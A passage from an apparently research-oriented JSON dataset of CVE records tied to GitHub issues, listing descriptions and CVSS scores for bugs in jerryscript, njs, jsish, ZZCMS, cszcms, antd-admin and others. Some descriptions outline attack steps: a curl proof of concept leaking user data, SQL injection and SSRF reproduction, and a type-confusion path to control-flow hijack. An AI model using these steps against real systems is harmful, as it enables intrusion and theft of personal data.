  76903. "description": "Assertion 'context_p >stack_top_uint8 == SCAN_STACK_TRY_STATEMENT || context_p >stack_top_uint8 == SCAN_STACK_CATCH_STATEMENT' failed at PATHTAG APITAG APITAG revision Commit: a6ab5e9 URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG microsoft standard NUMBERTAG Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case APITAG FILETAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG \u200b Execution steps & Output ERRORTAG",
  76904. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  76905. "severity": "MEDIUM",
  76906. "baseScore": 5.5,
  76907. "impactScore": 3.6,
  76908. "exploitabilityScore": 1.8
  76909. },
  76910. {
  76911. "CVE_ID": "CVE-2021-46342",
  76912. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/4934",
  76913. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/4934",
  76914. "Repo_new": "jerryscript-project/jerryscript",
  76915. "Issue_Created_At": "2022-01-04T06:13:59Z",
  76916. "description": "Assertion 'ecma_is_lexical_environment (obj_p) || !ecma_op_object_is_fast_array (obj_p)' failed at PATHTAG APITAG APITAG revision Commit: a6ab5e9 URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG microsoft standard NUMBERTAG Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case APITAG FILETAG APITAG APITAG APITAG ERRORTAG APITAG APITAG APITAG \u200b Execution steps & Output ERRORTAG",
  76917. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  76918. "severity": "MEDIUM",
  76919. "baseScore": 5.5,
  76920. "impactScore": 3.6,
  76921. "exploitabilityScore": 1.8
  76922. },
  76923. {
  76924. "CVE_ID": "CVE-2021-46343",
  76925. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/4921",
  76926. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/4921",
  76927. "Repo_new": "jerryscript-project/jerryscript",
  76928. "Issue_Created_At": "2022-01-04T06:02:03Z",
  76929. "description": "Assertion 'context_p APITAG == LEXER_LITERAL' failed at PATHTAG APITAG APITAG revision Commit: a6ab5e9 URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG microsoft standard NUMBERTAG Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case APITAG FILETAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG \u200b Execution steps & Output ERRORTAG",
  76930. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  76931. "severity": "MEDIUM",
  76932. "baseScore": 5.5,
  76933. "impactScore": 3.6,
  76934. "exploitabilityScore": 1.8
  76935. },
  76936. {
  76937. "CVE_ID": "CVE-2021-46344",
  76938. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/4928",
  76939. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/4928",
  76940. "Repo_new": "jerryscript-project/jerryscript",
  76941. "Issue_Created_At": "2022-01-04T06:07:34Z",
  76942. "description": "Assertion 'flags & APITAG failed at PATHTAG APITAG APITAG revision Commit: a6ab5e9 URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG microsoft standard NUMBERTAG Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case APITAG FILETAG APITAG APITAG APITAG ERRORTAG APITAG APITAG APITAG \u200b Execution steps & Output ERRORTAG",
  76943. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  76944. "severity": "MEDIUM",
  76945. "baseScore": 5.5,
  76946. "impactScore": 3.6,
  76947. "exploitabilityScore": 1.8
  76948. },
  76949. {
  76950. "CVE_ID": "CVE-2021-46345",
  76951. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/4920",
  76952. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/4920",
  76953. "Repo_new": "jerryscript-project/jerryscript",
  76954. "Issue_Created_At": "2022-01-04T06:01:01Z",
  76955. "description": "Assertion 'cesu8_cursor_p == cesu8_end_p' failed at PATHTAG APITAG APITAG revision Commit: a6ab5e9 URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG microsoft standard NUMBERTAG Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case APITAG FILETAG APITAG APITAG APITAG ERRORTAG APITAG APITAG APITAG \u200b Execution steps & Output ERRORTAG",
  76956. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  76957. "severity": "MEDIUM",
  76958. "baseScore": 5.5,
  76959. "impactScore": 3.6,
  76960. "exploitabilityScore": 1.8
  76961. },
  76962. {
  76963. "CVE_ID": "CVE-2021-46346",
  76964. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/4939",
  76965. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/4939",
  76966. "Repo_new": "jerryscript-project/jerryscript",
  76967. "Issue_Created_At": "2022-01-04T06:20:47Z",
  76968. "description": "Assertion 'local_tza == APITAG (date_value)' failed at PATHTAG APITAG . APITAG revision Commit: a6ab5e9 URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG microsoft standard NUMBERTAG Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case APITAG FILETAG APITAG APITAG APITAG CODETAG APITAG APITAG APITAG \u200b Execution steps & Output ERRORTAG",
  76969. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  76970. "severity": "MEDIUM",
  76971. "baseScore": 5.5,
  76972. "impactScore": 3.6,
  76973. "exploitabilityScore": 1.8
  76974. },
  76975. {
  76976. "CVE_ID": "CVE-2021-46347",
  76977. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/4938",
  76978. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/4938",
  76979. "Repo_new": "jerryscript-project/jerryscript",
  76980. "Issue_Created_At": "2022-01-04T06:20:03Z",
  76981. "description": "Assertion APITAG (obj_p)' failed at PATHTAG APITAG APITAG revision Commit: a6ab5e9 URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG microsoft standard NUMBERTAG Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case APITAG FILETAG APITAG APITAG APITAG CODETAG APITAG APITAG APITAG \u200b Execution steps & Output ERRORTAG",
  76982. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  76983. "severity": "MEDIUM",
  76984. "baseScore": 5.5,
  76985. "impactScore": 3.6,
  76986. "exploitabilityScore": 1.8
  76987. },
  76988. {
  76989. "CVE_ID": "CVE-2021-46348",
  76990. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/4941",
  76991. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/4941",
  76992. "Repo_new": "jerryscript-project/jerryscript",
  76993. "Issue_Created_At": "2022-01-04T06:22:36Z",
  76994. "description": "Assertion APITAG (string_p)' failed at PATHTAG (ecma_free_string_list NUMBERTAG APITAG revision Commit: a6ab5e9 URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG microsoft standard NUMBERTAG Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case APITAG FILETAG APITAG APITAG APITAG ERRORTAG APITAG APITAG APITAG \u200b \u200b Execution steps & Output ERRORTAG",
  76995. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  76996. "severity": "MEDIUM",
  76997. "baseScore": 5.5,
  76998. "impactScore": 3.6,
  76999. "exploitabilityScore": 1.8
  77000. },
  77001. {
  77002. "CVE_ID": "CVE-2021-46349",
  77003. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/4937",
  77004. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/4937",
  77005. "Repo_new": "jerryscript-project/jerryscript",
  77006. "Issue_Created_At": "2022-01-04T06:19:15Z",
  77007. "description": "Assertion 'type == ECMA_OBJECT_TYPE_GENERAL || type == ECMA_OBJECT_TYPE_PROXY' failed at PATHTAG APITAG APITAG revision Commit: a6ab5e9 URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG microsoft standard NUMBERTAG Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case APITAG FILETAG APITAG APITAG APITAG ERRORTAG APITAG APITAG APITAG \u200b Execution steps & Output ERRORTAG",
  77008. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  77009. "severity": "MEDIUM",
  77010. "baseScore": 5.5,
  77011. "impactScore": 3.6,
  77012. "exploitabilityScore": 1.8
  77013. },
  77014. {
  77015. "CVE_ID": "CVE-2021-46350",
  77016. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/4936",
  77017. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/4936",
  77018. "Repo_new": "jerryscript-project/jerryscript",
  77019. "Issue_Created_At": "2022-01-04T06:18:34Z",
  77020. "description": "Assertion 'ecma_is_value_object (value)' failed at PATHTAG APITAG APITAG revision Commit: a6ab5e9 URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG microsoft standard NUMBERTAG Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case APITAG FILETAG APITAG APITAG APITAG ERRORTAG APITAG APITAG APITAG \u200b Execution steps & Output ERRORTAG",
  77021. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  77022. "severity": "MEDIUM",
  77023. "baseScore": 5.5,
  77024. "impactScore": 3.6,
  77025. "exploitabilityScore": 1.8
  77026. },
  77027. {
  77028. "CVE_ID": "CVE-2021-46351",
  77029. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/4940",
  77030. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/4940",
  77031. "Repo_new": "jerryscript-project/jerryscript",
  77032. "Issue_Created_At": "2022-01-04T06:21:48Z",
  77033. "description": "Assertion 'local_tza == APITAG (date_value)' failed at PATHTAG APITAG APITAG revision Commit: a6ab5e9 URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG microsoft standard NUMBERTAG Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case APITAG FILETAG APITAG APITAG APITAG CODETAG APITAG APITAG APITAG \u200b Execution steps & Output ERRORTAG",
  77034. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  77035. "severity": "MEDIUM",
  77036. "baseScore": 5.5,
  77037. "impactScore": 3.6,
  77038. "exploitabilityScore": 1.8
  77039. },
  77040. {
  77041. "CVE_ID": "CVE-2021-46354",
  77042. "Issue_Url_old": "https://github.com/cybelesoft/virtualui/issues/3",
  77043. "Issue_Url_new": "https://github.com/cybelesoft/virtualui/issues/3",
  77044. "Repo_new": "cybelesoft/virtualui",
  77045. "Issue_Created_At": "2022-01-11T11:40:02Z",
  77046. "description": "Vulnerability External Service Interaction. Dear Cybele Software, My name is Daniel Morales. I have found a vulnerability in Thinfinity APITAG that could allow a malicious actor to trigger a server side request to external endpoints. Summary External service interaction arises when it is possible to induce an application to interact with an arbitrary external service. The ability to send requests to other systems can allow the vulnerable server to filtrate the real IP of the webserver or increase the attack surface (it may be used also to filtrate the real IP behind a CDN) Payload An example of the HTTP request \" URLTAG APITAG APITAG APITAG APITAG where \" domain.com \" is the external endpoint to be requested. Vulnerable versions It has been tested in APITAG version NUMBERTAG and NUMBERTAG",
  77047. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  77048. "severity": "HIGH",
  77049. "baseScore": 7.5,
  77050. "impactScore": 3.6,
  77051. "exploitabilityScore": 3.9
  77052. },
  77053. {
  77054. "CVE_ID": "CVE-2021-46359",
  77055. "Issue_Url_old": "https://github.com/FISCO-BCOS/FISCO-BCOS/issues/2124",
  77056. "Issue_Url_new": "https://github.com/fisco-bcos/fisco-bcos/issues/2124",
  77057. "Repo_new": "fisco-bcos/fisco-bcos",
  77058. "Issue_Created_At": "2022-01-12T06:15:50Z",
  77059. "description": "Transactions fail to be committed and the consensus process is stuck. Describe the bug I use the testing programs to send NUMBERTAG transactions to a group with NUMBERTAG nodes, it seems that over NUMBERTAG of the transactions cannot be committed successfully. APITAG To Reproduce Steps to reproduce the behavior NUMBERTAG Setup a group with NUMBERTAG nodes, each with a small size of tx pool NUMBERTAG Constantly sending txs to the group NUMBERTAG If the tx pool of the leader node is full, the consensus process will be stuck. Expected behavior All transactions should be commited successfully. Environment (please complete the following information): OS: Ubuntu NUMBERTAG FISCO BCOS release NUMBERTAG rc2",
  77060. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  77061. "severity": "HIGH",
  77062. "baseScore": 7.5,
  77063. "impactScore": 3.6,
  77064. "exploitabilityScore": 3.9
  77065. },
  77066. {
  77067. "CVE_ID": "CVE-2021-46371",
  77068. "Issue_Url_old": "https://github.com/zuiidea/antd-admin/issues/1127",
  77069. "Issue_Url_new": "https://github.com/zuiidea/antd-admin/issues/1127",
  77070. "Repo_new": "zuiidea/antd-admin",
  77071. "Issue_Created_At": "2022-01-13T01:50:22Z",
  77072. "description": "Unauthorized access to some interfaces in the foreground was found. Procedure NUMBERTAG Unauthorized access to some interfaces in the foreground leads to leakage of sensitive information NUMBERTAG Install according to the official documents FILETAG NUMBERTAG Unauthorized access is found on some interfaces For example: PATHTAG the poc is : curl A APITAG APITAG NT NUMBERTAG Win NUMBERTAG APITAG (KHTML, like Gecko) APITAG Safari NUMBERTAG URLTAG NUMBERTAG At this time you can see some information back, such as the user ID, name, age, phone number, address and other sensitive information. FILETAG NUMBERTAG It can also be reproduced in the official sample site URLTAG the poc is : curl A APITAG APITAG NT NUMBERTAG Win NUMBERTAG APITAG (KHTML, like Gecko) APITAG Safari NUMBERTAG URLTAG FILETAG",
  77073. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  77074. "severity": "HIGH",
  77075. "baseScore": 7.5,
  77076. "impactScore": 3.6,
  77077. "exploitabilityScore": 3.9
  77078. },
  77079. {
  77080. "CVE_ID": "CVE-2021-46377",
  77081. "Issue_Url_old": "https://github.com/cskaza/cszcms/issues/33",
  77082. "Issue_Url_new": "https://github.com/cskaza/cszcms/issues/33",
  77083. "Repo_new": "cskaza/cszcms",
  77084. "Issue_Created_At": "2022-01-14T09:13:29Z",
  77085. "description": "Bug Report: There is a front end boolean based sql injection vulnerability. Hi, I found a front end sql injection vulnerability in cszcms NUMBERTAG The vulnerable code is on APITAG The APITAG parameter here can be controlled by the user FILETAG And no filtering leads to sql injection vulnerability FILETAG First register a user in the foreground, then log in, then visit APITAG APITAG The content returned by the webpage is: FILETAG visit APITAG APITAG The content returned by the webpage is: FILETAG It's a Boolean based SQL injection Suggest: Add a filter function to this parameter",
  77086. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  77087. "severity": "CRITICAL",
  77088. "baseScore": 9.8,
  77089. "impactScore": 5.9,
  77090. "exploitabilityScore": 3.9
  77091. },
  77092. {
  77093. "CVE_ID": "CVE-2021-46433",
  77094. "Issue_Url_old": "https://github.com/fenom-template/fenom/issues/331",
  77095. "Issue_Url_new": "https://github.com/fenom-template/fenom/issues/331",
  77096. "Repo_new": "fenom-template/fenom",
  77097. "Issue_Created_At": "2022-01-19T04:45:25Z",
  77098. "description": "Security Issue. Hi, In fenom NUMBERTAG and before ,there is a way to bypass sandbox to exec arbitrary php code when disable_native_funcs is true.",
  77099. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
  77100. "severity": "CRITICAL",
  77101. "baseScore": 10.0,
  77102. "impactScore": 6.0,
  77103. "exploitabilityScore": 3.9
  77104. },
  77105. {
  77106. "CVE_ID": "CVE-2021-46434",
  77107. "Issue_Url_old": "https://github.com/emqx/emqx/issues/6791",
  77108. "Issue_Url_new": "https://github.com/emqx/emqx/issues/6791",
  77109. "Repo_new": "emqx/emqx",
  77110. "Issue_Created_At": "2022-01-19T07:01:59Z",
  77111. "description": "Username Enumeration. APITAG APITAG APITAG Subject of the issue When a user login, the application returns different results depending on whether the account is correct that allowed an attacker to determine if a given username was valid. Your environment EMQ NUMBERTAG Steps to reproduce The problem lies in the \"/api NUMBERTAG auth\" interface If you log in using an existing account and the Password is incorrect, APITAG Error\" is displayed. FILETAG and APITAG Not Found\" is displayed when you log in using a non existent account. FILETAG",
  77112. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  77113. "severity": "MEDIUM",
  77114. "baseScore": 5.3,
  77115. "impactScore": 1.4,
  77116. "exploitabilityScore": 3.9
  77117. },
  77118. {
  77119. "CVE_ID": "CVE-2021-46436",
  77120. "Issue_Url_old": "https://github.com/xunyang1/ZZCMS/issues/1",
  77121. "Issue_Url_new": "https://github.com/xunyang1/zzcms/issues/1",
  77122. "Repo_new": "xunyang1/zzcms",
  77123. "Issue_Created_At": "2022-01-19T14:28:50Z",
  77124. "description": "ZZCMS NUMBERTAG has a SQL injection vulnerability. ZZCMS NUMBERTAG sqlinject NUMBERTAG APITAG by rerce&rpsate ZZCMS the lastest version download page : FILETAG Environmental requirements PHP version NUMBERTAG Mysql version NUMBERTAG ulnerability code: in file FILETAG line NUMBERTAG FILETAG As shown in the picture above, parameter b is directly assigned to $b. FILETAG Then, $b is directly spliced into the SQL statement in line NUMBERTAG which leads to the SQL injection vulnerability. POC NUMBERTAG First log in to the administrator account NUMBERTAG isit URLTAG and intercept with burp NUMBERTAG You can see that the delay is NUMBERTAG s. FILETAG",
  77125. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  77126. "severity": "HIGH",
  77127. "baseScore": 7.2,
  77128. "impactScore": 5.9,
  77129. "exploitabilityScore": 1.2
  77130. },
  77131. {
  77132. "CVE_ID": "CVE-2021-46437",
  77133. "Issue_Url_old": "https://github.com/xunyang1/ZZCMS/issues/2",
  77134. "Issue_Url_new": "https://github.com/xunyang1/zzcms/issues/2",
  77135. "Repo_new": "xunyang1/zzcms",
  77136. "Issue_Created_At": "2022-01-19T15:30:55Z",
  77137. "description": "ZZCMS NUMBERTAG has a xss vulnerability. ZZCMS NUMBERTAG SS NUMBERTAG APITAG by rerce&rpsate ZZCMS the lastest version download page : FILETAG Environmental requirements PHP version NUMBERTAG Mysql version NUMBERTAG ulnerability code: In the file APITAG line APITAG variable APITAG can be controlled by the APITAG ,then output on line NUMBERTAG and it not be filtered. FILETAG POC NUMBERTAG First log in to the administrator account NUMBERTAG isit ERRORTAG NUMBERTAG you will see a popup. FILETAG",
  77138. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  77139. "severity": "MEDIUM",
  77140. "baseScore": 4.8,
  77141. "impactScore": 2.7,
  77142. "exploitabilityScore": 1.7
  77143. },
  77144. {
  77145. "CVE_ID": "CVE-2021-46461",
  77146. "Issue_Url_old": "https://github.com/nginx/njs/issues/450",
  77147. "Issue_Url_new": "https://github.com/nginx/njs/issues/450",
  77148. "Repo_new": "nginx/njs",
  77149. "Issue_Created_At": "2021-12-24T06:33:59Z",
  77150. "description": "illegal memcpy during njs_vmcode_typeof in PATHTAG Env CODETAG POC ERRORTAG Stack Dump ERRORTAG Credit P1umer, afang NUMBERTAG Kotori of APITAG",
  77151. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  77152. "severity": "CRITICAL",
  77153. "baseScore": 9.8,
  77154. "impactScore": 5.9,
  77155. "exploitabilityScore": 3.9
  77156. },
  77157. {
  77158. "CVE_ID": "CVE-2021-46462",
  77159. "Issue_Url_old": "https://github.com/nginx/njs/issues/449",
  77160. "Issue_Url_new": "https://github.com/nginx/njs/issues/449",
  77161. "Repo_new": "nginx/njs",
  77162. "Issue_Created_At": "2021-12-24T06:28:54Z",
  77163. "description": "SEGV PATHTAG in njs_object_set_prototype. Env CODETAG POC ERRORTAG Stack Dump ERRORTAG Credit P1umer, afang NUMBERTAG Kotori of APITAG",
  77164. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  77165. "severity": "HIGH",
  77166. "baseScore": 7.5,
  77167. "impactScore": 3.6,
  77168. "exploitabilityScore": 3.9
  77169. },
  77170. {
  77171. "CVE_ID": "CVE-2021-46463",
  77172. "Issue_Url_old": "https://github.com/nginx/njs/issues/447",
  77173. "Issue_Url_new": "https://github.com/nginx/njs/issues/447",
  77174. "Repo_new": "nginx/njs",
  77175. "Issue_Created_At": "2021-12-20T05:07:22Z",
  77176. "description": "Control flow hijack caused by Type Confusion of Promise object. Env CODETAG Poc ERRORTAG Analysis The output of the above poc is as follows: APITAG If I comment out APITAG ERRORTAG Then the output will be normal as follows: APITAG This is because APITAG has Type Confusion vuln when dealing with promise objects. The code APITAG will write the integer APITAG to APITAG field of data that has been confused as APITAG , although data may be of other types actually. CODETAG Therefore, when we try to change the data to the Symbol type: ERRORTAG The following error will be reported as expected: ERRORTAG We deliberately introduce the non writable APITAG to prove the validity of the vulnerability. Of course, this primitive can be used to confuse OTHER types of objects, and combined with heap spray technology to achieve control flow hijacking. Found by P1umer, Kotori, afang NUMBERTAG IIE Varas",
  77177. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  77178. "severity": "CRITICAL",
  77179. "baseScore": 9.8,
  77180. "impactScore": 5.9,
  77181. "exploitabilityScore": 3.9
  77182. },
  77183. {
  77184. "CVE_ID": "CVE-2021-46474",
  77185. "Issue_Url_old": "https://github.com/pcmacdon/jsish/issues/57",
  77186. "Issue_Url_new": "https://github.com/pcmacdon/jsish/issues/57",
  77187. "Repo_new": "pcmacdon/jsish",
  77188. "Issue_Created_At": "2021-12-24T09:47:27Z",
  77189. "description": "Heap buffer overflow APITAG in APITAG Jsish revision Commit NUMBERTAG fa NUMBERTAG e URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case ERRORTAG \u200b Execution steps & Output ERRORTAG",
  77190. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  77191. "severity": "MEDIUM",
  77192. "baseScore": 5.5,
  77193. "impactScore": 3.6,
  77194. "exploitabilityScore": 1.8
  77195. },
  77196. {
  77197. "CVE_ID": "CVE-2021-46475",
  77198. "Issue_Url_old": "https://github.com/pcmacdon/jsish/issues/64",
  77199. "Issue_Url_new": "https://github.com/pcmacdon/jsish/issues/64",
  77200. "Repo_new": "pcmacdon/jsish",
  77201. "Issue_Created_At": "2021-12-24T10:33:23Z",
  77202. "description": "Heap buffer overflow APITAG in APITAG Jsish revision Commit NUMBERTAG fa NUMBERTAG e URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case ERRORTAG \u200b Execution steps & Output ERRORTAG",
  77203. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  77204. "severity": "MEDIUM",
  77205. "baseScore": 5.5,
  77206. "impactScore": 3.6,
  77207. "exploitabilityScore": 1.8
  77208. },
  77209. {
  77210. "CVE_ID": "CVE-2021-46477",
  77211. "Issue_Url_old": "https://github.com/pcmacdon/jsish/issues/63",
  77212. "Issue_Url_new": "https://github.com/pcmacdon/jsish/issues/63",
  77213. "Repo_new": "pcmacdon/jsish",
  77214. "Issue_Created_At": "2021-12-24T10:32:32Z",
  77215. "description": "Heap buffer overflow APITAG in APITAG Jsish revision Commit NUMBERTAG fa NUMBERTAG e URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case ERRORTAG \u200b Execution steps & Output ERRORTAG",
  77216. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  77217. "severity": "MEDIUM",
  77218. "baseScore": 5.5,
  77219. "impactScore": 3.6,
  77220. "exploitabilityScore": 1.8
  77221. },
  77222. {
  77223. "CVE_ID": "CVE-2021-46478",
  77224. "Issue_Url_old": "https://github.com/pcmacdon/jsish/issues/60",
  77225. "Issue_Url_new": "https://github.com/pcmacdon/jsish/issues/60",
  77226. "Repo_new": "pcmacdon/jsish",
  77227. "Issue_Created_At": "2021-12-24T09:50:51Z",
  77228. "description": "Heap buffer overflow APITAG in APITAG Jsish revision Commit NUMBERTAG fa NUMBERTAG e URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case CODETAG \u200b Execution steps & Output ERRORTAG",
  77229. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  77230. "severity": "MEDIUM",
  77231. "baseScore": 5.5,
  77232. "impactScore": 3.6,
  77233. "exploitabilityScore": 1.8
  77234. },
  77235. {
  77236. "CVE_ID": "CVE-2021-46480",
  77237. "Issue_Url_old": "https://github.com/pcmacdon/jsish/issues/61",
  77238. "Issue_Url_new": "https://github.com/pcmacdon/jsish/issues/61",
  77239. "Repo_new": "pcmacdon/jsish",
  77240. "Issue_Created_At": "2021-12-24T10:30:42Z",
  77241. "description": "Heap buffer overflow APITAG in APITAG Jsish revision Commit NUMBERTAG fa NUMBERTAG e URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case ERRORTAG \u200b Execution steps & Output ERRORTAG",
  77242. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  77243. "severity": "MEDIUM",
  77244. "baseScore": 5.5,
  77245. "impactScore": 3.6,
  77246. "exploitabilityScore": 1.8
  77247. },
  77248. {
  77249. "CVE_ID": "CVE-2021-46481",
  77250. "Issue_Url_old": "https://github.com/pcmacdon/jsish/issues/55",
  77251. "Issue_Url_new": "https://github.com/pcmacdon/jsish/issues/55",
  77252. "Repo_new": "pcmacdon/jsish",
  77253. "Issue_Created_At": "2021-12-24T09:44:48Z",
  77254. "description": "Memory leaks in linenoise APITAG Jsish revision Commit NUMBERTAG fa NUMBERTAG e URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case CODETAG \u200b Execution steps & Output ERRORTAG",
  77255. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  77256. "severity": "MEDIUM",
  77257. "baseScore": 5.5,
  77258. "impactScore": 3.6,
  77259. "exploitabilityScore": 1.8
  77260. },
  77261. {
  77262. "CVE_ID": "CVE-2021-46482",
  77263. "Issue_Url_old": "https://github.com/pcmacdon/jsish/issues/66",
  77264. "Issue_Url_new": "https://github.com/pcmacdon/jsish/issues/66",
  77265. "Repo_new": "pcmacdon/jsish",
  77266. "Issue_Created_At": "2021-12-24T10:35:07Z",
  77267. "description": "Heap buffer overflow APITAG in APITAG Jsish revision Commit NUMBERTAG fa NUMBERTAG e URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case APITAG \u200b Execution steps & Output ERRORTAG",
  77268. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  77269. "severity": "HIGH",
  77270. "baseScore": 7.8,
  77271. "impactScore": 5.9,
  77272. "exploitabilityScore": 1.8
  77273. },
  77274. {
  77275. "CVE_ID": "CVE-2021-46483",
  77276. "Issue_Url_old": "https://github.com/pcmacdon/jsish/issues/62",
  77277. "Issue_Url_new": "https://github.com/pcmacdon/jsish/issues/62",
  77278. "Repo_new": "pcmacdon/jsish",
  77279. "Issue_Created_At": "2021-12-24T10:31:27Z",
  77280. "description": "Heap buffer overflow APITAG in APITAG Jsish revision Commit NUMBERTAG fa NUMBERTAG e URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case ERRORTAG \u200b Execution steps & Output ERRORTAG",
  77281. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  77282. "severity": "HIGH",
  77283. "baseScore": 7.8,
  77284. "impactScore": 5.9,
